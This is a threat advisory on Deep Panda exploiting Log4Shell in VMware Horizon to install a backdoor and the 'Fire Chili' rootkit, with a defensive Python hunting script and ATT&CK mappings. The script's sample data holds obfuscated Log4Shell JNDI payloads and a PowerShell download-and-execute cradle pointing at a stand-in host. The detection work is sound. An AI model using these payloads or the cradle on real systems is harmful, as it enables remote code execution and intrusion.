Deep Panda deploys new rootkit “Fire Chili” by exploiting Log4Shell in VMware Horizon
THREAT LEVEL: Red
Deep Panda, a Chinese APT group, exploited the well-known Log4Shell vulnerability in VMware Horizon servers to deploy a backdoor and a kernel rootkit and to steal sensitive data. The observed victims are primarily organisations in the finance, education, beauty, and travel industries.
The intrusions begin with exploitation of Log4Shell (CVE-2021-44228) on unpatched VMware Horizon servers. Successful exploitation spawns a new PowerShell process that downloads and executes a chain of scripts, ending with the installation of the Milestone backdoor, which reports information about the compromised system and its current user sessions to the remote server. A kernel rootkit named “Fire Chili” was also recovered from these intrusions; it is digitally signed with code-signing certificates stolen from game development companies, so the signature looks legitimate and the driver avoids scrutiny by security software.
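The Python below is an added example written for this advisory, not code from the advisory or from Fortinet's analysis. It implements two hunting checks for the chain described above: first, a request-log check that finds a Log4Shell lookup even when the attacker hides the string "jndi" behind nested Log4j lookups or percent-encoding (only the ${x:-default}, ${lower:..} and ${upper:..} forms are handled); second, a process-creation check that flags PowerShell or cmd being spawned by the Horizon web tier. The log lines and process events are constructed sample data, and the parent process name ws_TomcatService.exe is an assumption about a default Horizon Connection Server install; adjust it to the service name observed in your own telemetry.

```python
# Added example (not from the advisory): hunting for Log4Shell exploitation of
# VMware Horizon and for the PowerShell-from-Tomcat child process it produces.
import re
from urllib.parse import unquote
from typing import Dict, List, Optional

# A lookup with no further ${...} nested inside it.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The fully resolved form we ultimately want to match: ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def _resolve_lookup(body: str) -> str:
    """Resolve one innermost Log4j lookup the way Log4j 2.x does before the
    JNDI lookup fires. Only the forms commonly used to hide the string
    "jndi" are handled: ${x:-default}, ${lower:..} and ${upper:..}.
    Anything else (including ${jndi:...} itself) is left in place so the
    final regex can match it."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    key, sep, value = body.partition(":")
    if sep and key.lower() == "lower":
        return value.lower()
    if sep and key.lower() == "upper":
        return value.upper()
    return "${" + body + "}"


def normalize_lookups(s: str, max_rounds: int = 16) -> str:
    """Collapse nested lookups innermost-first until nothing changes."""
    for _ in range(max_rounds):
        new = _INNER_LOOKUP.sub(lambda m: _resolve_lookup(m.group(1)), s)
        if new == s:
            return s
        s = new
    return s


def _url_decode(s: str, max_rounds: int = 3) -> str:
    """Undo (possibly repeated) percent-encoding of the payload."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def detect_jndi(log_line: str) -> Optional[str]:
    """Return the JNDI scheme ('ldap', 'rmi', ...) if the line carries a
    Log4Shell lookup after decoding and de-nesting, otherwise None."""
    m = _JNDI.search(normalize_lookups(_url_decode(log_line)))
    return m.group(1).lower() if m else None


# --- Endpoint side: the web tier should never spawn a script interpreter ----
# Assumption: Horizon Connection Server's Tomcat runs as ws_TomcatService.exe.
HORIZON_WEB_PARENTS = {"ws_tomcatservice.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_child(event: Dict[str, str]) -> bool:
    """True for a process-creation event (Sysmon Event ID 1 field names)
    in which the Horizon web service spawns PowerShell or cmd."""
    return (_basename(event.get("ParentImage", "")) in HORIZON_WEB_PARENTS
            and _basename(event.get("Image", "")) in SCRIPT_HOSTS)


# Constructed sample data (not real telemetry); 198.51.100.7 is a documentation address.
SAMPLE_LOG_LINES = [
    'GET /portal/info.jsp HTTP/1.1 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    'GET /portal/info.jsp HTTP/1.1 200 "${${lower:j}ndi:${lower:RMI}://198.51.100.7/a}"',
    'GET /portal/info.jsp HTTP/1.1 200 "%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D"',
    'GET /portal/info.jsp HTTP/1.1 200 "Mozilla/5.0"',
]
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX((New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1'))\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},
]


def hunt(log_lines: List[str], events: List[Dict[str, str]]) -> List[str]:
    """Run both checks and return one finding string per hit."""
    findings = []
    for line in log_lines:
        scheme = detect_jndi(line)
        if scheme:
            findings.append(f"log4shell probe via {scheme}: {line}")
    for ev in events:
        if suspicious_child(ev):
            findings.append(f"script host spawned by Horizon web tier: {ev['CommandLine']}")
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG_LINES, SAMPLE_EVENTS):
        print(finding)
```

The log-side check is deliberately run after decoding and de-nesting rather than as a plain "${jndi:" substring match, because the obfuscated forms in the sample lines were exactly what attackers used to slip past WAF signatures during the Log4Shell wave. The endpoint-side check is the higher-fidelity signal: a Horizon web service process has no legitimate reason to start PowerShell, so a single hit there warrants an incident, not a ticket.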
The MITRE ATT&CK tactics and techniques commonly used by Deep Panda are:
TA0042: Resource Development
TA0001: Initial Access
TA0002: Execution
TA0003: Persistence
TA0004: Privilege Escalation
TA0005: Defense Evasion
TA0007: Discovery
TA0009: Collection
TA0010: Exfiltration
TA0043: Reconnaissance
T1190: Exploit Public-Facing Application
T1041: Exfiltration Over C2 Channel
T1082: System Information Discovery
T1036: Masquerading
T1083: File and Directory Discovery
T1592: Gather Victim Host Information
T1014: Rootkit
T1620: Reflective Code Loading
T1113: Screen Capture
T1569.002: System Services: Service Execution
T1059.001: Command and Scripting Interpreter: PowerShell
T1027.002: Obfuscated Files or Information: Software Packing
T1059.003: Command and Scripting Interpreter: Windows Command Shell
T1588.003: Obtain Capabilities: Code Signing Certificates
T1574.002: Hijack Execution Flow: DLL Side-Loading
Actor Details

Vulnerability Details

Indicators of Compromise

Patch Links
https://logging.apache.org/log4j/2.x/manual/migration.html
https://kb.vmware.com/s/article/87073
References
https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits